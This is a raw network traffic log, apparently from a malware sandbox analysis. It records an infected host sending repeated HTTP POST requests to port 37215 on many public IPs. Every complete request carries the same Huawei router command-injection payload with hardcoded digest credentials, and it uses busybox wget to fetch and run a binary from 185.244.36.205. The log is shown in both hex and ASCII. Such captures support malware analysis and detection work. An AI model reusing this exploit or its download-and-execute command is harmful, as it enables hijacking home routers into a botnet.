                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2434192.168.2.153560837.43.90.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476777077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2435192.168.2.155801841.212.60.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476814032 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2436192.168.2.153741294.87.88.9037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476820946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2437192.168.2.1536856222.38.30.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476839066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2438192.168.2.155726441.135.108.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476847887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2439192.168.2.153816494.158.17.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476872921 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2440192.168.2.154138237.132.64.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476890087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2441192.168.2.1532858121.148.59.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476912022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2442192.168.2.1550050121.17.70.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476923943 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2443192.168.2.1543964186.142.14.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.476937056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2444192.168.2.1540302222.43.170.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.477292061 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
